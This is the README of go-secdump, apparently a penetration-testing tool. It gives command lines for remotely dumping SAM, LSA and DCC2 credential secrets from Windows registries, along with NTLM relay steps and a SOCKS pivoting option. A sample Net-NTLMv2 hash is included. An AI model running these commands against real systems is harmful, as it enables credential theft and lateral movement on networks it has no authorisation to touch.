Go Secdump

go-secdump


Description

Package go-secdump is a tool for dumping registry secrets.


Features

  • Dump SAM, LSA, and DCC2 cache secrets
  • Supports NTLM relaying
  • Supports SOCKS proxy relay

Usage


Basic usage

  • go-secdump --host <target_ip> --user <username> --pass <password>
    • Dump all registry secrets (SAM, LSA, and DCC2)

SAM, LSA, or DCC2 cache secret dumping

  • go-secdump --host <target_ip> --user <username> --pass <password> --sam
    • Dump only SAM secrets
  • go-secdump --host <target_ip> --user <username> --pass <password> --lsa
    • Dump only LSA secrets
  • go-secdump --host <target_ip> --user <username> --pass <password> --dcc2
    • Dump only DCC2 cache secrets

NTLM relaying

  • Start listener: go-secdump --host 192.168.0.100 -n --relay
    • Trigger an auth to your machine from a client with administrative access to 192.168.0.100
    • Wait for the dumped secrets
  • Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0

SOCKS proxy relay

  • go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080
    • Use the upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality



